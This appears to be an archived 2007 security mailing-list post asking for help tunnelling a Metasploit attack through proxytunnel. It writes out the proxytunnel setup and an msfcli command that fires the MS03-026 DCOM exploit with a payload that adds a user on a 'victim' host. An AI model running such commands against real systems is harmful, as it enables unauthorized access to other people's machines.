Running metasploit thru proxytunnel

From: James Kelly (macubergeek@comcast.net)
Date: Sat Oct 06 2007 - 07:18:19 EDT

• Next message: A. R.: "sqlninja 0.2.1 released"
• Previous message: crazy frog crazy frog: "Re: Inguma v0.0.4 release"
• Next in thread: Alexander Bondarenko: "Re: Running metasploit thru proxytunnel"
• Reply: Alexander Bondarenko: "Re: Running metasploit thru proxytunnel"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Folks

I've been banging my head into my keyboard for two days now, not
getting anywhere and I was hoping one of
you could smack me upside the head and tell me what I've screwed up.

Problem:

attacker IP: 1.2.3.4
proxy IP: 2.3.4.5
proxy port 6666
victim: 3.4.5.6
victim port: 7777

Proxytunnel setup:

proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777
**now the above config works fine with rdesktop when I use:

proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
and I do
rdesktop localhost:666 <--I can ts to the victim box just fine.

When I try to do metasploit over proxytunnel I do
config:
Metasploit framework2
exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
Shell" ;-) goes to RPORT 135
payload: win32_adduser

first the tunnel:
proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
now metasploit
msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
RPORT=235 PASS=password USER=blah

When I hit the exploit I see "Sending Request..." then nothing.

I can rdesktop via proxytunnel to the victim successfully but cannot
login with username blah password password.

Assume the victim is vulnerable to dcom.

Now can anything obvious that I've screwed up?

________________________________________________________________________
____
01001001 01100110 01111001 01101111 01110101 01100011 01100001
01101110
01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011
01111001 01101111 01110101 01101110 01100101 01100101 01100100 01110100
01101111 01100111 01100101 01110100 01100001 01101100 01101001
01100110
01100101 0010111
________________________________________________________________________
____

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: A. R.: "sqlninja 0.2.1 released"
• Previous message: crazy frog crazy frog: "Re: Inguma v0.0.4 release"
• Next in thread: Alexander Bondarenko: "Re: Running metasploit thru proxytunnel"
• Reply: Alexander Bondarenko: "Re: Running metasploit thru proxytunnel"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT